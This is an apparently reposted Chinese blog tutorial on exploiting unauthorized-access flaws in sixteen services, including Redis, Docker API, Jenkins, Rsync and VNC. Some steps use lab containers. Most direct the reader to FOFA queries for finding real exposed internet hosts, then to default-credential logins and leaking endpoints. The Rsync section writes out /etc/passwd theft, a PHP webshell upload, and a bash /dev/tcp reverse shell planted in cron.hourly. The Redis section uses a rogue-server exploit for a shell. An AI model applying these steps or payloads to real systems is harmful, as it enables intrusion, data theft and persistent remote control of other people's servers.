当前位置: 首页 > news >正文

常见的未授权访问漏洞靶场-练习教程

一.Redis未授权访问漏洞

1.首先需要准备一个vps和vulhub靶场,然后进入目录。

命令:进入靶场目录:cd /etc/vulhub-master/redis/4-unacc  启动靶场:docker-compose up -d

2.然后启动我们kali,下载redis服务然后连接redis,并执行命令。(这一步就证明存在未授权访问漏洞)

命令:下载redis:apt-get install redis    连接:redis-cli -h 靶场IP -p 端口

3.接下来需要下载一个攻击项目:https://github.com/n0b0dyCN/redis-rogue-server

4.下载在我们的vps上然后启动,启动命令:python3 redis-rogue-server.py --rhost 目标IP地址 --lhost 本机IP地址

5.然后就可以执行命令了(反弹shell)

二、MongoDB未授权访问漏洞

1.首先需要搭建靶场。

命令:拉取镜像:docker pull mongo   启动容器:docker run -d -p 272017:27017 --name mongodb mongo

2.然后我们使用kali的nmap的插件进行扫描,去扫描一下未授权访问漏洞。命令:nmap -p 27017 --script mongodb-info 47.105.65.103

 3.验证存在未授权访问漏洞后就直接可以使用navicat连接了。

三、Memcached未授权访问漏洞

1.首先我们需要下载Memcached:https://www.runoob.com/memcached/window-install-memcached.html。

2.接下来执行命令:memcached.exe -d install    ----> memcached.exe -d start 

3.接下来打开kali探测,输入:telnet 172.16.2.26 11211 ,接下来就可以操作命令。

3.接下来就可以使用namp程序进行漏洞扫描,打开kali输入:nmap -p 11211 --script memcached-info 172.16.2.26

四、Jenkins未授权访问漏洞

1.使用fofa语法搜索

fofa语法:port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

2.搜到结构筛选到有manage Jenkins的然后按照图片执行。

五、Jupyter NoteBook

1.首先通过fofa语法搜索:"Jupyter Notebook" && port="8888" && "terminals"。然后按照图片操作。

2.然后接下来就可以执行命令了

六、Elasticsearch未授权访问漏洞

1.首先利用fofa搜索,fofa语法:"Elasticsearch" && port="9200"。搜索出来后就可以在后面加上一些敏感目录就可以访问到了。

2.访问到后就可以看到了

七、Kibana未授权访问漏洞

1.使用fofa语法搜索资产,fofa语法:"kibana" && port="5601"

2.接下来寻找有漏洞的网址,有漏洞的网址如图所示

八、Docker Remote API未授权访问漏洞

1.使用fofa搜索:port="2375" && "docker"

2.搜索到后就可以测试是否存在漏洞了,如图所示操作。

九、Kubernetes API Server未授权访问漏洞

1.首先使用fofa搜索:port="8080" && app="Kubernetes"

2.然后接下来在可以使用的网站后面拼接/version,就可以看到信息了

十、Hadoop未授权访问漏洞

1.使用fofa搜索:port="8088" && app="Hadoop"

2.开启页面直接访问不用经过用户密码验证就可以了

十一、ActiveMQ未授权访问漏洞

1.使用fofa搜索:body="ActiveMQ" && port="8161"

2.然后在网址后面拼接/admin进入后台登录,默认账户密码都为:admin

3.登录成功后就可以查看信息了

十二、RabbitMQ未授权访问漏洞

1.我们使用fofa搜索:port="15672"或者port="15692"或者port="25672"、

2.打开页面后就可以登录了,默认账户、密码都是guest

十三、Sprinboot Astuator未授权访问漏洞

1.使用fofa搜索:icon_hash="116323821"

2.当点开链接出来以下界面,就代表定当前 web 应用是使用了springboot 框架

3.可以拼接以下路径查看泄露的数据。

访问/trace端点可以获取基本的HTTP请求跟踪信息,访问/env端点获取全部环境属性

十四、JBOSS未授权访问漏洞

1.我们点开fofa搜索:title="Welcome to JBoss" && icon_hash="-656811182"并且打开一个链接。

2.然后在后面拼接/jmx-console/就可以之间登录进去了

十五、Rsync未授权访问漏洞

1.这一关我们需要用到vulhub靶场,我们来到vulhub靶场然后启动。

命令: 

cd vulhub/rsync/common

docker-compose up -d

2.然后我们来到kali执行命令:rsync rsync://自己靶机的IP/

3.然后我们就可以下载目标靶机上的文件。输入命令:rsync rsync://IP:port/src/etc/passwd ⽬标路径

4.然后我们查看以下下载下来的文件,可以看到成功下载了passwd

5.我们也可以上传文件,比如一句话木马。我们输入:rsync ./phpinfo.php rsync://目标靶机ip/src/home 。 phpinfo.php里面写上一句话木马。

6.接下来我们就可以反弹shell,查看定时任务

7.然后将定时任务文件下载下来,输入:rsync rsync://靶机ip/src/etc/crontab /tmp/tmp/crontab.txt

8.然后创建一个shell文件,输入:/bin/bash -i >& /dev/tcp/监听靶机IP/4444 0>&1

9.给文件授权,输入:chmod 777 shell

10.上传shell到靶机,输入:rsync -av /tmp/tmp/shell rsync://靶机ip/src/etc/cr

on.hourly
11.攻击机器开启端口监听,输入:nc -lvvp 4444

十六、vpc未授权访问漏洞

1.使用fofa搜索:(port="5900") && (is_honeypot=false && is_fraud=false)

2.然后打开kali,输入:msfconsole

3.然后输入:use auxiliary/scanner/vnc/vnc_none_auth

http://www.lryc.cn/news/602508.html

相关文章:

  • 2.DRF 序列化器-Serializer
  • 从2025世界人工智能大会,看AI与算力的临界点突破
  • 【MySQL学习|黑马笔记|Day1】数据库概述,SQL|通用语法、SQL分类、DDL
  • DMETL安装流程及简单使用
  • 2025年人工智能三大突破:多模态推理、具身智能与全球治理
  • Java 数学工具类 Math
  • 实用工具类分享:BeanCopyUtils 实现对象深浅拷贝高效处理
  • 对于ui=f(state)的理解(react)
  • 基于springboot的大创管理系统(源码+论文+开题报告)
  • 【React Context API 优化与性能实践指南】
  • 【前端】React 与 Vue:前端两大框架的全方位对比解析
  • JVM 内存模型深度解析:原子性、可见性与有序性的实现
  • 如何给电脑换个ip地址?电脑换ip几种方法
  • 测试平台开发:自动化测试平台----需求分析
  • fmriprep安装与试用_附ubuntu分区大小调整
  • NAT地址转换,静态NAT,高级NAT,NAPT,easy IP
  • JAVA_EIGHTEEN_特殊文件
  • 使用 nvm (Node Version Manager) 来管理多个 Node.js 版本,并自由切换
  • 从文件到文件描述符:理解程序与文件的交互本质
  • 前端可智能识别的搜索组件 SearchBox 使用详解!
  • DOM编程:table表格开发常用属性和操作汇总
  • it is not annotated with @ClientEndpoint“
  • nginx日志分割
  • Webhook技术深度解析:从原理到实现全指南
  • Cloudflare CDN 中设置地域限制并返回特定界面
  • DNF 与 YUM 的区别详解:从 CentOS 7 到 CentOS 9 的演进
  • nuttx串口驱动框架设计
  • HCIP笔记(第一、二章)
  • 设计模式(十六)行为型:解释器模式详解
  • 自定义View学习记录 plinko游戏View